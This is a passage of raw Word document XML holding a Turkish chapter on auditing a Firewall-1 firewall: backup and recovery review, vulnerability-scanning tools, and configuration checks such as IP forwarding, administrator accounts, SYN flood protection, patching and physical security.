        <w:t>Yedekleme prosedürlerini ve belgelerini</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gözden geçirin. Yedekleme prosedürlerinin bir bölümü de içermelidir restorasyon prosedürleri. Yedekleme, yalnızca yapılan yedeklemelerden biri kurtarılabiliyorsa tamamlanmış sayılmalıdır. Ayrıca, yedeklerin güvenli bir yerde saklanması gerekir. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70E44">
        <w:t>Güvenlik duvarının yeniden yapılması veya değiştirilmesi gerektiğinde, geri yüklenmesi gereken birkaç dosya vardır (bkz. Ek 41.1). Bu dosyalar, bir teyp sürücüsü veya başka bir büyük depolama cihazı gibi harici bir cihaz kullanılarak tam bir sistem yedeklemesi yoluyla yedeklenebilir.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F70E44">
        <w:t>Güvenlik duvarı işlevselliği için en kritik dosyalar diskete sığabilmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70E44" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70E44" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00431491">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5E9CD899" wp14:editId="422E450A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1709420</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>285750</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3009900" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="4102" name="Resim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anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F70E44">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ek 41.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  Kritik Güvenlik Duvarı-1 Yapılandırma Dosyaları Yedeklenecek</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00431491" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="fotograflar"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70E44" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70E44" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70E44" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70E44" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70E44" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70E44" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70E44" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00F70E44" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4"/>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Yedekleme zamanlamasını inceleyin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00F70E44">
        <w:t>Güvenlik duvarı sistemini kurtarmak için prosedürlerin uygulanıp uygulanmadığını, hizmette bir kesinti olması durumunda belirleyin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Acil durum planını gözden geçirin.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Acil durum planı dokümantasyonu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bilgi Güvenliği Politikaları ve Prosedürleri (Thomas Peltier, Auerbach Publications) politika dağıtımına başlamak için iyi bir yerdir. Kapsamlı bir politika setinin olmayışı için her derde deva olmamasına rağmen, Bilgi Güvenliği Politikaları ve Prosedürleri bir kuruluşun, politikalarına boğulmadan politikaları hızla dağıtmasını sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tüm bu analiz ve incelemelerin işletme</w:t>
      </w:r>
      <w:r w:rsidRPr="00A037C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>kuruluşun amaçları bağlamında yapılması gerektiği belirtilmelidir. Bilgi sistemleri güvenliği risk yönetimi ile ilgili olmakla birlikte, kurumsal strateji çerçevesinde uygulanmazsa, güvenlik başarısızlıkla sonuçlanır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6990"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A5192D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Adım 3: Ana Bilgisayar Yazılım Değerlendirme Taramasını Gerçekleştirin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Güvenlik duvarı yanlış yapılandırması, güvenlik duvarının varlığına rağmen yetkisiz kişilerin (yabancıların) ağa girmesine izin verebilir. Tek tek güvenlik duvarı ana bilgisayarlarına karşı yazılım taramaları gerçekleştirerek, belirli güvenlik açıklarını tespit edilebilir. Bu tarama araçları güvenlik açıklarını tanımlayabilir, sistem zayıflıklarını detaylandırabilir, politikaları doğrulayabilir ve kurumsal güvenlik stratejilerini uygulayabilir. Bu tür araçlar sistem açıklarını kontrol etmek için çok önemlidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Tarayıcıların tanımlayabileceği sayısız kontrolün bazıları şunlardır:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>İşletim sistemi yanlış yapılandırması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Uygunsuz güvenlik ve şifre ayarları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:t>Arabellek taşması</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:t>SANS İlk 10 İnternet Güvenliği Tehditinin Tespiti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:t>FreeBSD'yi etkileyen segmentasyon hatası</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Parolasız NT konuk ve yönetici hesaplarının tespiti</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:t>Bazı popüler tarama araçları şunları içerir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D24030" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:t xml:space="preserve">NAI Cybercop, </w:t>
      </w:r>
      <w:hyperlink r:id="rId101" w:history="1">
        <w:r w:rsidRPr="00D24030">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:color w:val="002060"/>
          </w:rPr>
          <w:t>http://www.pgp.com/products/cybercop-scanner</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D24030" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:t>ISS İnternet Tarayıcı</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D24030">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>http://www.iss.net/internet_scanner/index.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:t>SAINT</w:t>
      </w:r>
      <w:r w:rsidRPr="00D24030">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t>, http://www.wwdsi.com/saint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D24030" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Symantec (formerly Axent) NetRecon, </w:t>
      </w:r>
      <w:hyperlink r:id="rId102" w:history="1">
        <w:r w:rsidRPr="004D6343">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://enterprisesecurity.symantec.com/products</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D24030" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:t>Netcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00D24030">
        <w:rPr>
          <w:color w:val="002060"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:hyperlink r:id="rId103" w:history="1">
        <w:r w:rsidRPr="004D6343">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://www.l0pht.com/~weld/netcat/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="62"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:t xml:space="preserve">nmap, </w:t>
      </w:r>
      <w:hyperlink r:id="rId104" w:history="1">
        <w:r w:rsidRPr="004D6343">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
          </w:rPr>
          <w:t>http://www.insecure.org/nmap/index.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:t>Bir güvenlik duvarı üzerinde bir ana bilgisayar yazılım değerlendirme taraması çalıştırmanın bir güvenlik duvarı incelemesinin yalnızca bir yönü olduğu belirtilmelidir. Cybercop gibi araçların kullanımı oldukça kolaydır; Bu nedenle, araçları çalıştırmak için profesyonel bir hizmet firması getirmeye gerek yoktur. Güvenlik uzmanı servis firmaları tarafından katma değer, kapsamlı mimari tasarım, analiz ve hata iyileştirme alanlarındadır. Bu araçları çalıştıracak ve müşteriye sadece ürünü teslim edecek herhangi bir firma müşteriye ciddi bir adaletsizlik yapıyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Bu, yalnızca bir güvenlik altyapısının başlangıçtan itibaren tasarlanması gerektiği noktasını yinelemeye hizmet eder. Bu mimari güvenlik, kapasite, yedeklilik ve yönetim gibi unsurları dikkate almalıdır. İyi bir mimari olmadan, sistemin yeniden tasarımı sürekli bir çaba olacaktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00D24030" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Adım 4: Güvenlik Duvarı-1 Yapılandırmasını Gözden Geçirin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Firewall-1 önemli bir güvenlik sağlarken, Firewall-1 yanlış yapılandırılmışsa bu güvenlik tehlikeye girebilir. İncelenecek daha önemli öğelerden bazıları aşağıda listelenmiştir (belirli bir sırada değil).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>IP Yönlendirme.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:t>IP Yönlendirmeyi Kontrol Et'e ayarlayın. İşletim sistemi çekirdeğinde IP Yönlendirme devre dışı bırakılmalıdır. Bu, Firewall-1 çalışmadığı sürece IP Yönlendirmenin hiçbir zaman etkinleştirilmemesini sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Güvenlik Duvarı Yöneticileri.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:t>Güvenlik Duvarı-1 yöneticilerinin sayısının yalnızca gerçekten ihtiyacı olanlarla sınırlı olduğundan emin olun. Güvenlik duvarındaki her hesabın amacı (hem işletim sistemi hem de güvenlik duvarı işletim sistemi için) doğrulanmalıdır. Sergi 41.2, güvenlik duvarı yöneticilerinin ve izinlerinin bir listesini sağlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008F2095" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D24030">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Eğitilmiş çalışanlar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Güvenlik duvarı altyapısını yöneten personelin deneyimli olmadığı sürece bir güvenlik duvarı etkili olamaz. Güvenlik duvarı-1 işlemlerinde güvenlik ve eğitimli. Bir kişi güvenlik duvarından yalnızca ağ kurma konusunda tecrübe sahibi olduğu için sorumlu tutuluyorsa, güvenlik duvarının, rakiplerin güvenlik duvarını tehlikeye atmasını daha kolay hale getirecek şekilde yanlış yapılandırmalarla doldurulması beklenir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008F2095" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2095">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SYN Taşkın Koruması.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Hizmet reddi (DoS) saldırıları, saldırganın uzak bir ana bilgisayardaki kaynakları düzgün çalışamayacak derecede tüketmesini sağlar. SYN taşkın saldırıları en yaygın DoS saldırısı türlerinden biridir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>SYN taşkın korumasının uygun seviyede etkinleştirildiğinden emin olun: Yok, SYN Ağ Geçidi veya Pasif SYN Ağ Geçidi (bkz. Ek 41.3).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="008F2095" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2095">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>İşletim Sistemi Versiyon Kontrolü.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Hem Checkpoint yazılımı hem de ağ işletim sistemi için, güvenlik duvarının Güvenlik Duvarı-1'in güncel ve desteklenen bir sürümünü çalıştırdığından emin olun. En son sürümün özellikle yüklenmesi gerekmese de, geçerli yamaların yüklendiğinden emin olun.</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jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00883D94">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>EXHIBIT 41.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00883D94">
        <w:t>Güvenlik duvarı yöneticileri ve izinleri</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="041B7A36" wp14:editId="2D2C1A79">
            <wp:extent cx="3581400" cy="3743781"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="4103" name="Resim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3410" cy="3745882"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB3C5D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00883D94">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Fizikse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>l güvenlik.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Güvenlik duvarı fiziksel olarak korunmalıdır. Tüm ağ işletim sistemlerinin kendi temellerini oluşturdukları belirtilmelidir. güvenli bir fiziksel altyapı üzerinde güvenlik modelleri. Erişimin olduğu alanlarda güvenlik duvarı bulunmalıdır.sadece yetkili personel ile sınırlıdır; özellikle:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Yerel konsol güvenli olmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00883D94">
        <w:t>Yönetim konsolu harici ağa açık olmamalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Güvenlik duvarı yapılandırması tamamen korunmalı ve kurcalamaya karşı korumalı olmalıdır.</w:t>
      </w:r>
      <w:r w:rsidRPr="00883D94">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(yetkili yönetim istasyonu hariç).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Yerel yönetim için yönetici için tam kimlik doğrulaması yapılmalıdır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="63"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00883D94">
        <w:t>Uzaktan yönetim için tam kimlik doğrulama ve şifreli bir bağlantı gereklidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00BB3C5D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
